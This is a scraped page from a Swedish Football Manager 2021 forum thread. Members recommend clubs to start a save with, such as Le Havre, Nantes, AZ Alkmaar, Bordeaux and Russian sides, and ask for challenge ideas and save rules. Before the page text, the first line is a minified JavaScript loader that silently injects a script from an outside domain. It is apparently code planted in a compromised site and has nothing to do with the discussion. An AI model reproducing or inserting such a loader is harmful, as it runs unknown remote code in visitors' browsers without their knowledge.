;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilken klubb ska du börja med och varför? – Sida 4 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Vilken klubb ska du...

Share:
Notifications
Clear all

Vilken klubb ska du börja med och varför?

78 Inlägg
53 Users
163 Reactions
7,298 Visningar
zXc
 zXc
(@zxc)
Estimable Member

@johndocherty

Har faktiskt aldrig testat ryska ligan heller. Men kommer nog göra det på denna upplagan. Krasnodar känns ju då närmast till hands iom svenskkopplingen. 

JohnDocherty reacted
SvaraCitera
Patrick92
(@patrick92)
Eminent Member

Postad av: @johndocherty

Funderar starkt på att starta en save i Ryssland, lutar åt Krasnodar. Ny liga för mig då jag inte spelat den förr. Någon som har erfarenheter av ryska ligasystemet? 

Jag har spelat en hel del i Ryssland då jag gillar Zenit. Tycker ligan är rolig. Det långa vinteruppehållet i Ryssland är lite segt dock. Sen har väl FM inte superkoll på ryska ligan, t.ex. finns ju bara de två högsta ligorna. Och vissa namn och stats osv kan vara lite knepiga. 

SvaraCitera
(@emoll)
Active Member

Hejsan!

Valde starta en karriär med den franska klubben Le Havre, som huserar i franska division 2(Ligue 2).
Valet av klubb föll på att jag ville ta över en klubb i någon lägre division, samt att Le Havre har en stark ungdomsakademi, en av de mest välkända i Frankrike där spelare som Paul Pogba fostrats bla.

Under sommaren köpte vi in Gavi från Barcelona B, en supertalang som i början av spelet har en skev utköpsklausul i kontraktet på bara 300.000€. Utöver honom riktade jag ögonen mot Afrika, där jag lyckades värva några riktigt stora talanger som förhoppningsvis kan blomma ut till världsstjärnor.
Säsongen har gått bra hittills när vi närmar oss Mars månad. Ligger på en förstaplats i serien med endast 1 förlust och 4 oavgjorda. Den unge talangen Godwin Bentil sprutar in mål i ligan där han även leder i skytteligan.

Mitt mål är egentligen att bli en mästarklubb i Frankrike, som framförallt byggs på egenfostrade spelare med blandad kompott mest från Afrika men även Frankrike. Inte helt främmande för talanger från andra ställen med, men fokuset ska ligga där.

Väl mött! Vill ni har tips på afrikanska gems så hör av er!

zXc reacted
SvaraCitera
(@richard-ostlund)
Active Member

Ryska ligan är rätt kul faktiskt! Hade jag kört där nu så hade jag nog valt Dynamo Moskva. Bra transferbudget, ny arena och bra faciliteter i övrigt. Där ska man nog kunna skapa något riktigt bra och långsiktigt. Rostov är nog inte heller så illa att testa i.

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@emoll

Försök att få in någon afrikansk samarbetsklubb där du kan hämta in talanger ? 

SvaraCitera
(@emoll)
Active Member

@zxc

Det skulle man kunna, men jag känner att man isf behöver ha flera st om det ska vara meningsfullt. Spelare från Afrika är redan billiga som de är, så behövs egentligen inte samarbetsklubbar, utan egentligen bara en stark scouting som håller koll på de mer utmärkande länderna såsom Senegal, Ghana, Marocko och Nigeria tex. 

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@emoll

Självklart är det så. Jag menade mer för spelglädjens skull. Att det skulle kännas mer som i verkligheten. 

Emoll reacted
SvaraCitera
friggan
(@friggan)
Estimable Member

Sitter med ett just inhandlat FM21 och funderar lite på val av lag. Vilket av följande tycker ni?

• Italienska landslaget
    • Jag tycker att de har så otroligt många spännande spelare på gång! Vill spela och se om jag kan göra dem till världsmästare!
  • Ett topp/medel-lag i Nederländska ligan
    • Jag funderar på typ AZ. Jag tänkte köpa in billiga talanger och sälja dyrt! Kanske lite extra fokus på nordiska spelare
  • Alla Sveriges landslag
    • Har spelat med sveriges u-19,u-21 och a-landslag med samma tränare på samtliga FM spel och givetvis kommer jag göra det även i år. Frågan är om jag ska vänta lite bara!
  • Allsvenskan-Utmaning
    • En utmaning jag funderat ett tag på där jag ska vinna SM-Guld med "samtliga" lag i Allsvenskan. Jag vinner SM-guld, avgår och väntar in ett nytt lag att basa över! En regel ska också i så fall vara att jag inte ska få köpa spelare från lag jag ännu inte representerat (förutom som free agent och om spelaren är övergångslistad. Detta för att jag inte ska köpa en toppspelare från ett lag som ännu inte vunnit guld. Jag vill inte köpa sönder en klubb, för att sedan ta över laget och försöka vinna guld)

Då man kan kombinera så kanske det kan vara intressant att spela landslag+klubblag tillsammans, även om det då tar ganska lång tid att spela en säsong. Tror jag i så fall börjar med Italienska landslaget iallafall. Sen vet jag inte riktigt...

Men vad tycker ni? Jag kommer att rapportera i "hur går det-tråden".

SvaraCitera
(@krillesch)
Active Member

Jag har börjat med en save med Pushers BK i div6 Göteborg c, mitt lag från Majorna Linne 

SvaraCitera
(@krillesch)
Active Member

BörjDe en save som journeyman, fick jobb i bulgariska andra ligan med ett lag som heter Hebar Pazardzhik, ska bli roligt att köra, aldrig spelat en save där och en klubb utan övergångsbudget. Kan bli en svår nöt??

SvaraCitera
(@mikbj86)
Active Member

Rekommenderar verkligen Bordeaux. Efter senaste titeln har tabellplaceringarna stadigt gått neråt. Chansen här att vända och utmaningen att putta ner PSG från tronen är lockande. 

Truppen är ganska ålderstigen och tunn på centrala delarna vilket gör att man har mycket jobb att göra, finns bra akademi som kan bilda en ny stomme i laget.

finns lite roliga profiler Ben Arfa (sjukt svårplacerad att få ut kapacitet av) & Koscielny.

SvaraCitera
FMViktor91
(@fmviktor91)
Estimable Member

Funderar på att ta över Bodö/Glimt! Se om man kan i längden gå om Rosenborg

SvaraCitera
friggan
(@friggan)
Estimable Member

Jag kan verkligen rekommendera AZ Alkmaar!

Har spelat en säsong och är som besatt! Lagom svårt lag! Många bra konkurrenter i ligan som slåss om de bästa placeringarna! Laget har oerhört mycket talangfulla spelare, det är dock ganska svårt att hålla i dem alla då de större klubbarna lockar med sina pengar! Men det vimlar av talang i b-laget och u18! Sedan är det också lätt att värva bra spelare från Norden! 

Helt enkelt en förjävla perfekt utmaning! 

SvaraCitera
(@richard-ostlund)
Active Member

Kör med Nantes för tillfället, i januari ligger vi tillsammans i topp med PSG. Har fått in ett koppel intressanta spelare i Thiago Almada, Matias Arezo, Manuel Ugarte, Nico Rovella, Brendan Soppy och David Carmo. Finns ett bra gäng med talanger, Tomas Basila har varit klockren som mittback, Imran Louza och Ludovic Blas presterar bra och Alban Lafont i mål måste jag göra allt jag kan för att köpa loss sen. Finns dessutom ytterligare talanger i B-laget som ska kunna bli riktigt bra.

Alltid kul med franska lag, Bordeaux som jag ser fått rekommendation var också ett alternativ för mig. Metz, Strasbourg, Montpellier har gjort klart med ombyggnationer av arenorna IRL och sitter inne på bra förutsättningar för en rolig save imo. Toulouse och Nancy i Ligue 2 bör också kunna vara riktigt roliga.

This post was modified 4 år sedan by Richard Östlund

The Gustine and zXc reacted
SvaraCitera
Jimpacool
(@jimpacool)
Eminent Member

Behöver tips nu grappar. 
Efter en lång save med Bolton där tillslut datorn kapsejsade så är det dags för en ny save med en ny dator. 

Jag har svårt för att ta ett topplag eller ens ett lag i någon av landets högre divisioner. 
Vill ha en rejäl utmaning där man kan bygga en egen liten historia kring managern för laget. 
Gärna ett lag som tidigare varit relativt bra (likt Bolton) alternativt ett lag som bara är en rejäl utmaning och som har en större konkurrent i staden. 

SvaraCitera
The Gustine
(@the-gustine)
Trusted Member

@jimpacool

Jag har tittat lite på Akademisk Boldklub från Köpenhamn i danska tredjeligan. En av Danmarks äldsta klubbar och grundades 1889 av ett gäng akademiker. Bra arena på 13000+. Kom till och med så långt i mina tankar att jag satte ihop två kits med klassisk Carlsberg spons. Klicka här.

Utöver det har jag kikat lite på den Colombianska ligan vilken alltid får fram otroligt sköna regens. Andra alternativ för min del just nu är Kroatien, Skottland eller annan liga strax under topp-ligorna. Norge är också ett alternativ haha. Lite där mitt problem ligger just nu, att komma fram till ett lag och en liga...

thegustine @Twitter.

SvaraCitera
FMSvensson
(@fmsvensson)
Eminent Member

Postad av: @jimpacool

Behöver tips nu grappar. 
Efter en lång save med Bolton där tillslut datorn kapsejsade så är det dags för en ny save med en ny dator. 

Jag har svårt för att ta ett topplag eller ens ett lag i någon av landets högre divisioner. 
Vill ha en rejäl utmaning där man kan bygga en egen liten historia kring managern för laget. 
Gärna ett lag som tidigare varit relativt bra (likt Bolton) alternativt ett lag som bara är en rejäl utmaning och som har en större konkurrent i staden. 

@jimpacool kanske tråkigt köra England igen men Burton har ju både 5 stjärnor på ungdomsverksamheten och träningsanläggningen. Men startar väl i samma serie som Bolton så kanske inte lika lockande ta ett lag i samma, annars rekommenderar jag de. 

Deportiva de La Coruña är ju ett annat som varit ett storlag men som nu ligger i 3:e divisionen.

FC Sochaux i franska andra divisionen, har 2 liga titlar i bagaget.

SvaraCitera
FMSvensson
(@fmsvensson)
Eminent Member

Skulle behöva lite hjälp har inte sen spelet kom kunnat myna ut i en längre save. Jag har gärna velat igång en saverapport med United, då det är laget som ligger mig närmast till hands. De har länge gått en ökenvandring men börjar smått hitta tillbaka. Jag vill göra dem till klubben som dominerade första delen av 00-talet och lyckas hitta billiga spelare som sedan kan bli världsklass likt Evra, Evra, och Ronaldo även om det kanske inte var billigt vid den tidpunkten.

Det jag helst skulle vilja få är synpunkter på hur man skulle kunna sätta upp regler för saven. 

tex lämnar 4 ska jag då bara få ta in 4 st spelare för att göra att man inte köper sönder ett par säsonger in i spelet redan.

hur många ungdomspelare under 18 man t ex ska få ta in. 

vad tror ni om det?

SvaraCitera
Sida 4 / 4
Share: